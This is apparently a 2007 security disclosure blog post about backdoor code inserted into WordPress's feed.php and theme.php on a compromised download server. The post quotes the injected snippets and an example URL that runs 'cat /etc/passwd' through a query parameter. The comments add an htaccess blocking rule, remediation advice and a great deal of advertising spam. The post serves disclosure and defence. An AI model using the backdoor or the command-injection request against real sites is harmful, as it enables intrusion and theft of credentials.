Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }

in wp-includes/theme.php

function get_theme_mcommand($mcds) {
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

this would enable remote command execution on machines running compromised versions, for example

http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.

About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.


Mr Apache said...

Code to Forbid requests with querystrings ix or iz

RewriteCond %{QUERY_STRING} (ix|iz)
RewriteRule .* - [F]

Ultimate htaccess article

Doug Karr said...


Could this be utilized to obtain any information from the source site? Example: logins, passwords, MySQL configuration, OpenID configuration, etc?

I'm curious if simply downloading and installing the corrected software is a total solution or whether or not anyone is advising WP users to reconfigure their logins/passwords, etc.


Ivan Fratric said...

Dear Doug,

the exploitation of this, by itself, leads to command execution on the effected machine under the privileges of web server user, typically 'nobody'. This means that the cracker could read any files readable to this user. This typically includes web application configuration files (which typically contain mySQL username and password the web application uses to connect to the database), as well as files such as /etc/passwd, which contains a list of usernames for the server, which could be used in brute-force type attacks. Cracker could also modify any files writeable by this user and also upload files in folders writeable to this user.

However, you should also consider the following - obtaining the admin privileges on the machine once you have established the remote access, even as an unprivileged user, is usually by far easier than obtaining the remote access itself.

So to conclude, if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate.

Ivan Fratric said...

Plus, the cracker might manage to put some kind of backdoor on the server using this, so the absolutely safest thing to do would be to make the clean install of everything.

ceras said...

That bug dont work, i have wordpress from january, this files feed.php ...

and execution command dont work, i have white page :)

That fucking bullshits not bug

Ivan Fratric said...


You wouldn't be affected if you downloaded WordPress in January, only if you downloaded it between Feb 25th and Mar 2nd and only if you downloaded it from the compromised server.

If you want confirmation, take a look at

Shelly said...

I had a question. I just installed WP 2.1 (NOT 2.1.1) a few weeks ago for a client who needed 16 different installations (didn't want to use MU).

I've been told by the wp-pro list that I *should* be okay with 2.1, because the exploit wasn't in that version (and if it were, I had downloaded my copy January 28 - so I'm in the clear anyway). However, someone said that the reason 2.1.1 was released was to fix another security flaw, and I should have upgraded anyway.

I guess I'd like to know this: should I download the new 2.1.2 and upgrade all 16 of those blogs already? I don't know what security flaw is in 2.1 - nothing was mentioned - but I'd appreciate any advice on this.

Ivan Fratric said...


you really should be asking this in a WordPress support forum.
Having said that, I'm not aware of any vulnerabilities fixed from 2.1 to 2.1.1 (which doesn't mean there weren't any), but there are known vulnerabilities in 2.1.1 which are possibly present in previous versions as well. You can find out the details at
These are all script injection vulnerabilities. They aren't exactly what I would call critical, but should be taken care of nevertheless.

Shelly said...

Thanks Ivan,

Actually, I *did* ask at the support forums - I guess I'm impatient ;) I did get advice on basically what you said: that it wouldn't hurt to upgrade to 2.1.2, but it's not absolutely necessary.

I've already emailed the client with this information, and I'm letting them decide what they want me to do. I couldn't find the exact information you gave me (about the injection), but I did tell them there wouldn't have been an upgrade if it weren't something important.

Thanks for your advice - I appreciate it :)

Anonymous said...

For the time being this bug is not working on any of the Wordpress i tried. But this post is good, thanks for sharing..

Best Regards,
Eliena Andrews

Piyush said...

Hi Ivan,
I have posted about your discovery on my blog. Here is the link.
Thanks for sharing this.

John Diesel said...
This comment has been removed by the author.
John Diesel said...

This is really a very informational blog post. Your opinion about is really very useful as user point of view. Please keep sharing some more information.

Toronto security cameras | Toronto Control4

aliya seen said...

Only best programmers can dodatabase assignment because i am getting trouble whenevr i try to do myself.

Aeldra Robinson said...

if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate. This is really a very informational blog post. Your opinion about is really very useful as user point of view. Please keep sharing some more information.

mobile code security


Appreciative for such brilliant blog yours...!
Wordpress Development Company in India

Omkarsoft Bangalore said...

Nice blog.
We are the best Wordpress Development Company

Orion Technosoft said...

great article, its helps us alot.
Wordpress Development in Pune
Digital Marketing Services

Arnold Peter said...

Nice Article. I can able to gain some knowledge on web development. Thanks for sharing this post.

If you want to check more details on WordPress Website development Click here Wordpress Web Development Company

Dharampal Singh said...

Great article. keep trying to share your thought and content with us by your blog.Wordpress Web Development Services

Designpluz said...

Web Design Sydney: It is a great sharing...I am very much pleased with the contents you have mentioned. I wanted to thank you for this great article.Logo Design Sydney

Unknown said...

Greate Job.!Find the Wordpress Website Development Services in Pune.
Wordpress Developer in Pune
Wordpress Website Development Services in Pune

Pandya Mansi Rashmikant said...

This is a very helpful. Great Tips !! Keep publishing your content and published new content for good readers.Wordpress Web Development Services

Meentosys Pvt Ltd said...

nice blog post .. Meentosys is an Website Development Company In Delhi which delivers high quality, cost-effective, reliable, efficient and result oriented Website Development solutions to its clients from all over the India. We are professional Website Development Company at delivering projects to our clients on time with high client satisfaction.

Acme Webtechnology said...

WordPress source code compromised to enable remote code execution is really impressive and informative psst. Great job!

Magento development company

Ali said...

This is amazing blog i never ever had seen earlier.. I like the way you share...Wordpress Development Company USA

Sonali Taral said...

Thanks for sharing article about wordpress development company.
Wordpress Development Company in Pune

Ancy merina said...

It was really nice to read article written on this blog. I would also like to add few techniques with best of my knowledge which can help reader more and more.
Web development company in bangalore| web design company bangalore

Vibha said...

Searching for Wordpress Development Company
visit us at webgensis for custom web development services and Hire Wordpress Expert
who code your dreams live.

Zinavo said...

Really an interesting and amazing post. Thanks for sharing this wonderful informative article here. I appreciate your hard work.Website Development Bangalore | Web Designing Company Bangalore

Bangalore Web Guru said...

Thank you for your post. This is excellent information. It is amazing and wonderful to visit your site. Website Design Company Bangalore | Web Development Company Bangalore

webgensis mkt said...

if you are thinking about to make your online presence more powerful and design your ecommerce store with magento then Hire Magento Developer from us in affordable price. We are a certified Magento Development Company having years of experience in developing online stores with magento.

john ryans said...

Thank you for taking time & sharing the insights. Really a great post about Wordpress Development. to know more, visit here

shamvi sitsolutions said...

Shraddha IT solutions is professional best website designing and development software company in pune providing top services like Branding Logo Design , Brochure designer , Mobile app development , ecommerce web development web hosting , cms , best web development company in pune that boost your business in pune ,usa ,India.

shamvi sitsolutions said...

Shraddha IT solutions is professional best website designing and development software company in pune providing top services like Branding Logo Design , Brochure designer , Mobile app development , ecommerce web development web hosting , cms , best web development company in pune that boost your business in pune ,usa ,India.

bulk sms said...

Bulk SMS is brilliant, cost-effective, promotional, advertising service, and reasonable, these India service industry has given rise to some such aspects for which even the small scale and large scale industry are opting for these low-priced service profit.

carney brock said...

Thanks for sharing such a great information..Its really nice and informative..
Web development in Canada
Web development in Toronto

Shannon Prokup said...

Web development Chicago
Website design company Chicago
wordpress website builder chicago
web development company in chicago

bulk sms said...

Bulk SMS marketing is the best way for marketing your brand these days. Bulk SMS marketing is on the top of the list of most profitable yet useful approaches for any enterprise that wants to advertise and market the brand that it offers, to its potential customers. One can surely expect a huge amount of money, and a great client stand as well by using bulk SMS services.

Mobile: 9910589191

Suruchi Pandey said...

The details provided by you are much relevant and informative. Thanks for taking time to explain this here. Hope you'll post such articles in future again.
Lucknow Web Design Company | Web Redesign Company

Web Pixel World said...

Web Pixel World's Online Examination Management Software can manage all of your work to conduct online examination.
Web Pixel World web designing & development company in Dehradun free online training in web pixel world.

Dida ELhaik said...

تعد شركة تركيب اثاث ايكيا بالرياض هي الشركة الرائده والاولي في كافة الاثاث من تركيب وفك ونقل وتخزين وكافة الاعمال المتعلقة بالاثاث في الرياض وكافة المناطق والمحافظات بالمملكة العربية السعودية، وقد تصدرت شركة خبراء المملكة لتكون الأولى في مجال فك ونقل وتركيب الأثاث المنزلي وايضا فك وتركيب الستائر بالرياض وهي تتميز عن باقي شركات الرياض نظرا لما تقدمة من خدمات بشكل احترافي كما انها تتميز عن غيرها بكفاءة الفنيين والامتخصصين في مجال تركيب الاثاث فلا داعي لكثرة البحث فلديك خبراء المملكة فهم فعلا خبراء ومتميزون في جميع خدماتهم المقدمة
شركة تركيب اثاث ايكيا بالرياض
فني تركيب اثاث ايكيا بالرياض
شركة تركيب ستائر بالرياض
عامل تركيب ستائر بالرياض
شركة تركيب غرف نوم بالرياض
فني تركيب غرف نوم بالرياض
شركة تركيب باركية بالرياض
شركة تركيب عفش بالرياض
ما يميز شركة تركيب نقل وتركيب اثاث بالرياض
- تعد شركة تركيب اثاث ايكيا من الشركات المفضلة لكثير من العملاء فهم من منحوها الصدارة والتميز لتميز الخدمات المقدمة لهم وهي الاولي في تركيب الاثاث لزيادة خبراتها الكبيرة لسنوات.
تتميز ايضا شركة خبراء المملكة بكبر فرق العمل المتخصصة والمدربة بمهاره وتقنية عالية كما اننا ندعم صفوفنا بصفة مستمرة من العمال والموظفين والفنيين الأكفاء والمهرة كما انها Jستقبل العمالة الفليبنية

Ross Taylor said...

Wonderful blog !! Thanks for sharing this informative and detailed post. If you are running the business which can be small or large but it will require a mobile app to grow your business and keep you ahead in the competition. There is another article by which you can get more insights about.
Android App development
Website Development
Mobile App development
Ios App development

bulk sms said...

Bulk SMS India a lead the way in offering bulk promotional & transactional SMS solutions, located in India. We provide brilliance quality services for Bulk SMS marketing, Bulk E-mails, promotional SMS etc.

Pro Integrate said...

Nowadays, company like Pro Integrate wants their IT consultants to offer them staffing services. Several surveys have proven that IT consulting is really important. More and more companies are spending on these services. So we provide better and improved access to resources. Information which we provide cannot be done by the IT employees of your organization.

bulk sms said...

Bulk SMS services is the best mode to deliver your message to your customer then it is the newest choice for most of the companies these days.

EsolzUSA said...

A great website can do wonders in promoting your brand. If you are on the lookout for adequate fodder for your brand's growth, then you have to contact a reputable web development company anywhere in the United States.

priya nigam said...

We, Swavish software is Top Mobile Apps Development Company in Delhi NCR. The need for mobile app developers is thus increasing at a higher rate. So, we are here to develop different mobile apps for our clients and We also provide the best IT security services in Delhi.
Website: -

Swavish Softwares said...

Website Designing Company in Delhi offer services like responsive website design , ecommerce website design, custom website design in which our web designers deal directly with each customer.

Meentosys Pvt Ltd said...

hi thanks for Sharing blog, Our Services are the best Professional Web Design Service Company in Delhi, We are Doing worked from Website Designing Company in India. As a best website design company in India, we understand the importance that design and development of a website plays an important role in describing your image to customers as a brand. While web designing is important to attract more visitors to your website but keeping your visitors happy and engaged depends on the development of a website and its functionality. Only a well-designed website can maintain the uniqueness of your idea and this is fact understood by our team.Web Design Services, website designing Services, website designing services company in delhi

Meentosys Pvt Ltd said...

hi thanks for sharing blog, meentosys is the Web development company in India specifically cities like Delhi , Mumbai, Bengaluru are competing with the best website designing services in the world. The quality of website development company that make effective and cheap websites by Indian company is professional developers. Website Development Company in Delhi

GaneshYAI said...

Magento is one of the most popular eCommerce platform, customizable shopping cart platforms available. If you have chosen Magento as your eCommerce platform (WebSite), Acelerar can offer you end-to-end support with our efficient and streamlined Magento Bulk Product Upload Services at the most economical rates and 24x7 Support. Our Experts have a wealth of experience working on Magento Product Upload Services on eCommerce platform.

bulk sms said...

Bulk SMS services is the best method to delivered your message to your audience hence it is the hottest choice for most of the company these days.

bulk sms said...

NISM Series viii : Securities Markets Foundation Certification Examination is for entry level professionals, who wish to make a career in the securities markets. .This examination may be a voluntary examination. The nism series viii : Securities Markets institution Certification Examination is for entry level professionals, UN agency would like to create a career within the securities markets.

bilal khan said...

Exceptionally decent post. I just unearthed your weblog and needed to state that I've truly appreciated surfing around your blog entries. After all I'll be buying in to your feed and I trust you compose again soon!

Long Island Web Design Company

Ahmed arain said...

Web design Los Angeles
Wonderful cases. Extraordinary article. A debt of gratitude is in order for sharing this data.

Arbaz Khan said...

I would also motivate just about every person to save this web page for any favorite assistance to assist posted the appearance.
Miami Web Design

Vibha said...

if you want to Hire WordPress Developer to build your responsive and scalable web solutions completely based on your requirements. You can hire wordpress programmer to develope your websites and application on hourly or fixed basis from us. We offer you the flexibility to Hire Web Developer USA as well as you can Hire Dedicated Programmers from USA to develop your website on WordPress, Magento, Joomla, Shopify, BigCommerce or any other Php and similar platforms.

Sam Davis said...


Thank you for sharing useful information

Here i can share about my experience with clients Looking attractive and high quality Ecommerce Portal Development services with low cost. Ecommerce portal design and development services so please feel free to contact us.

Website Designing and Development

Ecommerce Portal Design and Development
Dynamic Ecommerce Portal Designing
PHP Website Development
Wordpress Website Development

vigneshwaran P said...

Hi Ivan Fratric,

The article is really good. It will be very helpful for the people to start with. Expecting more Wordpress Related Blogs.

Best Regards
-Vignes (Mobile app development company

Vignesh B said...

The Hacker who is able to execute such a flaw is usually able to execute commands with the programming language or the web server.
This will be very helpful for protecting our databases from the vulnerabilities .
Thank you admin.

Got Secure Applications in mind? Choose Devolve - (Web Application Development Calgary) to get started.

gunmetal jeans said...

Great job,keep i up​web development company in Bangalore

Augurs Technologies Pvt Ltd. said...

Web and Mobile Real Estate Applications India,
Real Estate Web Design Company Lucknow India,
Custom Real Estate Management Software Solutions,
Hire Estate Mobile App Development Services

Blog Adresleri said...

WordPress’in temel parçalarından birisi kuşkusuz wp-includes’tir. CMS’yi oluşturan çekirdek parçalarının tamamının burada olduğunu söyleyebiliriz. Bu durumda sitenizin güvenilirliğini sağlamak adına bu klasöre ciddi bir şekilde önem göstermelisiniz. Bu yazımda WordPress wp-includes klasörünün korunması konusuna bakacağız.

Syed Ehtisham Haider Gilani said...

Thanks for the information about web design and links you shared this is so should be a useful and quite informative!

Clicks Bazaar said...

This blog is really amazing.. i really appreciate your effort..From this blog i receive really very-very important information which is very necessary. SEO services

sanjeev kumar said...

Wow... Nice post. Thank you so much for sharing your valuable information. WordPress Web Development Services

Kevin Cooper said...

I am very grateful to read this informative blog. The IT company and its services are truly amazing and are helping companies on a large

Futuristic Bug said...

If you own a responsive website for your online business, then investing in the professional responsive site design services in India could add a lot of flair to your brand in the long run. So, make sure to get in touch with the best of website designers and developers in town.

Vibha said...

Web Development Company USA
Best Web Development Company in USA
Website Design Company
Web Design Company Near Me
Custom Web Design & Development Company
Ecommerce Web Design & Development Company
Php Development Company
WordPress Development Company

Sphinax info systems said...

Nice Post..Thanks for Sharing..
hr payroll software
hotel billing software
web design & development
hospital management software

web development in hyderabad said...

nice information. Thanks for sharing

Augurs Technologies Pvt Ltd. said...

Get the best real estate app development solutions from one of the leading mobile app development company. We provide customized mobile app development services for the real estate industry. Contact Us Now!